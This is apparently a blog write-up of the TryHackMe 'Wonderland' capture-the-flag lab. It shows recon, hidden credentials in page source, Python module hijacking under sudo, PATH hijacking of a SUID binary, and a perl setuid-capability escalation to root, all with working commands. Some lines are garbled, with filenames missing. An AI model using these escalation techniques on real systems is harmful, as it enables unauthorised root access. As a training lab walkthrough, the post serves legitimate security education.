TryHackMe - Wonderland write up
4 min read

TryHackMe - Wonderland write up

TryHackMe - Wonderland write up

Wonderland is a Medium Linux box.


As always, let's start with a nmap scan on the well-known ports :

$ nmap -p -1024 -oN scan.nmap

22/tcp open  ssh
80/tcp open  http

As you can see, there is two ports open, SSH and Web.


This HTML page is static and not interesting, so I run gobuster to find some new endpoints. Then I find a folder named r.

Keep going ?! So, I redo the same and I find a new folder named a (/r/a), then b (/r/a/b), b, i, and finally t (/r/a/b/b/i/t).

After looking at the HTML source code of the page, you can find this credentials :

<p style="display: none;">alice:HowDothTheLittleCrocodileXXXXX</p>

Let's try to SSH with this account.

xanhacks~ $ ssh alice@
Password : HowDothTheLittleCrocodileXXXXX
alice@wonderland:~$ id
uid=1001(alice) gid=1001(alice) groups=1001(alice)

We are in ! Not very realistic but the goal of this box is the privilege escalation part. So, what we can do on this box as alice.

User #1

alice@wonderland:~$ sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/

We can run as rabbit.

alice@wonderland:~$ ls -al
-rw-r--r-- 1 root  root  3577 May 25  2020
alice@wonderland:~$ cat 
import random

poem = """The sun was shining on the sea,
Shining with all his might:
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

When you import some module in Python, it will check first if the module exist in the current directory, if yes, Python will execute it.
So let's create a python script named in this directory. It is our home folder so we can write in.

alice@wonderland:~$ vim
alice@wonderland:~$ cat 
#!/usr/bin/env python3
import subprocess"/bin/bash")
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/
rabbit@wonderland:~$ id
uid=1002(rabbit) gid=1002(rabbit) groups=1002(rabbit)

User #2

We have a SUID binary in our home, let's examine it.

rabbit@wonderland:/home/rabbit$ ls -al
total 40
drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .
drwxr-xr-x 6 root   root    4096 May 25  2020 ..
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

rabbit@wonderland:/home/rabbit$ ltrace -s 128 ./teaParty
setuid(1003)                                                                                                                                       = -1
setgid(1003)                                                                                                                                       = -1
puts("Welcome to the tea party!\nThe Mad Hatter will be here soon."Welcome to the tea party!
The Mad Hatter will be here soon.
)                                                                               = 60
system("/bin/echo -n 'Probably by ' && date --date='next hour' -R"Probably by Wed, 30 Dec 2020 14:52:54 +0000
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                                                             = 0
puts("Ask very nicely, and I will give you some tea while you wait for him"Ask very nicely, and I will give you some tea while you wait for him
)                                                                       = 69
getchar(1, 0x55e18b741260, 0x7fb504db78c0, 0x7fb504ada154toto
)                                                                                         = 116
puts("Segmentation fault (core dumped)"Segmentation fault (core dumped)
)                                                                                                           = 33
+++ exited (status 33) +++

This program do a call to the commands /bin/echo (full path) and date (relative path). So, we can create our own date command that spawn a bash shell by altering our PATH variable.

rabbit@wonderland:/home/rabbit$ which date
rabbit@wonderland:/home/rabbit$ vim /tmp/date
rabbit@wonderland:/home/rabbit$ chmod +x /tmp/date
rabbit@wonderland:/home/rabbit$ cat /tmp/date

bash -p
rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ which date
/bin/date has changed to /tmp/date

Let's run the binary !

rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ id
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)

User #3

We have the password of the user on our home folder.

hatter@wonderland:/home/hatter$ cat password.txt 
Usefull for the next part (to have a proper shell)

After enumerating the box, I found something weird :

hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

We have the setuid capability on the two perl binaries. Let's check GTFOBins to exploit this.

hatter@wonderland:/home/hatter$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
bash: /usr/bin/perl: Permission denied
hatter@wonderland:/home/hatter$ su hatter
Password: WhyIsARavenLikeXXXX

hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
# cd /root
# ls
# cat user.txt
thm{"Curiouser XXXX"}
# cd /home/alice
# cat root.txt
thm{Twinkle, twinkle, little bat! XXXXXX }

We get the two flags !

Enjoying these posts? Subscribe for more